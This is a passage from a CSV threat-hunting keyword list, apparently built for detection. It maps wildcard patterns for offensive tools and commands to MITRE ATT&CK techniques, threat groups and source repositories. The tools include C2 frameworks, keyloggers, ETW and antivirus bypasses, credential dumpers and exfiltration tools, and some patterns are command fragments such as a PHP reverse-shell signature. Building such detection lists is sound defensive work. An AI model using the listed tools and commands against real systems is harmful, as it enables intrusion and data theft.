advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*from wapitiCore.*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*frpc.exe -c frpc.in*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*fsockopen(*0.0.0.0*4444*exec(*,offensive_tool_keyword,OMGLogger,Key logger which sends each and every key stroke of target remotely/locally.,T1056.001 - T1562.001,TA0004 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*FtpC2.exe*,offensive_tool_keyword,SharpFtpC2,A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/DarkCoderSc/SharpFtpC2,1,1,N/A,10,10,72,15,2023-06-23T08:40:08Z,2023-06-09T12:41:28Z -*FtpC2.Tasks*,offensive_tool_keyword,SharpFtpC2,A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/DarkCoderSc/SharpFtpC2,1,0,N/A,10,10,72,15,2023-06-23T08:40:08Z,2023-06-09T12:41:28Z -*ftp-server -u * -P * -p 2121*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ftshell -*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell,T1055 - T1036 - T1038 - T1203 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1,1,0,N/A,N/A,1,0,1,2017-04-10T05:02:35Z,2017-04-10T06:59:29Z -*ftshell.v3*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell,T1055 - T1036 - T1038 - T1203 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1,1,0,N/A,N/A,1,0,1,2017-04-10T05:02:35Z,2017-04-10T06:59:29Z -*ftype *findstr *dfil*,greyware_tool_keyword,ftype,will return the file type information for file types that include the string dfil - hidden objectif is to find cmdfile string,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ftype *findstr *SHCm*,greyware_tool_keyword,ftype,will return the file type information for file types that include the string SHCm - hidden objectif is to find SHCmdFile string,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ftype *findstr dfil*,greyware_tool_keyword,ftype,will return the file type information for file types that include the string dfil - hidden objectif is to find cmdfile string,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ftype *findstr SHCm*,greyware_tool_keyword,ftype,will return the file type information for file types that include the string SHCm - hidden objectif is to find SHCmdFile string,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Fuck-Etw-main*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*fucksetuptools*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*FuckThatPacker.*,offensive_tool_keyword,cobaltstrike,A simple python packer to easily bypass Windows Defender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Unknow101/FuckThatPacker,1,1,N/A,10,10,612,91,2022-04-03T18:20:01Z,2020-08-13T07:26:07Z -*FudgeC2.*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*FudgeC2Viewer.py*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*fuff *-input-shell*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*fuff *-scraperfile*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*fuff *-scrapers*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*FULLSHADE/WindowsExploitationResources*,offensive_tool_keyword,WindowsExploitationResources,Resources for Windows exploit development,T1203 - T1210 - T1212 - T1216 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/FULLSHADE/WindowsExploitationResources,1,1,N/A,N/A,10,1351,319,2021-12-20T00:21:07Z,2020-05-26T07:19:54Z -*func_get_powershell_dll*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*func_install_wine_dotnettojscript*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*function psenum*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*function Use-Zeus*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*FunnyWolf/pystinger*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z -*fuse_evil.*,offensive_tool_keyword,POC,Exploit for CVE-2022-27666,T1550 - T1555 - T1212 - T1558,TA0005,N/A,N/A,Exploitation tools,https://github.com/plummm/CVE-2022-27666,1,1,N/A,N/A,3,203,41,2022-03-28T18:21:00Z,2022-03-23T22:54:28Z -*fuse_lowlevel.h*,offensive_tool_keyword,POC,This repo contains demo exploits for CVE-2022-0185,T1210 - T1222 - T1506 - T1068,TA0002 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Crusaders-of-Rust/CVE-2022-0185,1,0,N/A,N/A,4,364,55,2022-04-25T04:11:33Z,2022-01-19T06:19:38Z -"*fuxploider --url * --not-regex ""wrong file type""*",offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*fuxploider*,offensive_tool_keyword,fuxploider,Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.,T1526 - T1505 - T1506 - T1574,TA0006 - TA0008,N/A,N/A,Web Attacks,https://github.com/almandin/fuxploider,1,0,N/A,N/A,10,2667,485,2023-04-16T19:57:12Z,2017-07-14T09:30:06Z -*fuzz_option.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*fuzzdb*,offensive_tool_keyword,fuzzdb,FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. Its the first and most comprehensive open dictionary of fault injection patterns. predictable resource locations. and regex for matching server responses.,T1190 - T1191 - T1192 - T1193 - T1197,TA0002 - TA0008,N/A,N/A,Web Attacks,https://github.com/fuzzdb-project/fuzzdb,1,0,N/A,N/A,10,7641,2094,2023-02-21T15:21:06Z,2015-09-10T17:54:31Z -*fuzzfactory.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*fuzzrequest.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*FuzzySecurity/Dendrobate*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*FuzzySecurity/Sharp-Suite*,offensive_tool_keyword,Sharp-Suite,C# offensive tools,T1027 - T1059.001 - T1562.001 - T1136.001,TA0004 - TA0005 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite,1,0,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*fw_walk disable*,offensive_tool_keyword,cobaltstrike,A BOF to interact with COM objects associated with the Windows software firewall.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Firewall_Walker_BOF,1,0,N/A,10,10,98,13,2021-10-10T03:28:27Z,2021-10-09T05:17:10Z -*g_hookedSleep.*,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,1,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -*g0h4n/RDE1*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,1,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*g0h4n/REC2*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*G0ldenGunSec/GetWebDAVStatus*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,1,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*g0tmi1k*,offensive_tool_keyword,Github Username,Github username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/g0tmi1k,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*g3tsyst3m/undertheradar*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,1,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*gabriellandau/PPLFault*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*GadgetToJScript.csproj*,offensive_tool_keyword,GadgetToJScript,A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.,T1059.001 - T1078 - T1059.005,TA0002 - TA0004 - TA0001,N/A,N/A,Exploitation tools,https://github.com/med0x2e/GadgetToJScript,1,1,N/A,10,8,777,157,2021-07-26T17:35:40Z,2019-10-05T12:27:19Z -*GadgetToJScript.exe -a *,offensive_tool_keyword,cobaltstrike,LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/LiquidSnake,1,0,N/A,10,10,306,47,2021-09-01T11:53:30Z,2021-08-31T12:23:01Z -*GadgetToJScript.sln*,offensive_tool_keyword,GadgetToJScript,A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.,T1059.001 - T1078 - T1059.005,TA0002 - TA0004 - TA0001,N/A,N/A,Exploitation tools,https://github.com/med0x2e/GadgetToJScript,1,1,N/A,10,8,777,157,2021-07-26T17:35:40Z,2019-10-05T12:27:19Z -*GadgetToJScript-master*,offensive_tool_keyword,GadgetToJScript,A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.,T1059.001 - T1078 - T1059.005,TA0002 - TA0004 - TA0001,N/A,N/A,Exploitation tools,https://github.com/med0x2e/GadgetToJScript,1,1,N/A,10,8,777,157,2021-07-26T17:35:40Z,2019-10-05T12:27:19Z -*Gality369/CS-Loader*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*GateTrampolin.asm*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,1,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*gateway-finder*,offensive_tool_keyword,gateway-finder-imp,This is an improved version of original Gateway-finder. New version rebuilt with python3 and support for files with MACs/IPs The homepage of original project is: http://pentestmonkey.net/tools/gateway-finder Gateway-finder is a scapy script that will help you determine which of the systems on the local LAN has IP forwarding enabled and which can reach the Internet.,T1016 - T1049 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Data Exfiltration,https://github.com/whitel1st/gateway-finder-imp,1,0,N/A,N/A,1,57,7,2020-12-14T09:52:29Z,2018-04-18T12:43:11Z -*gather/keylogger*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 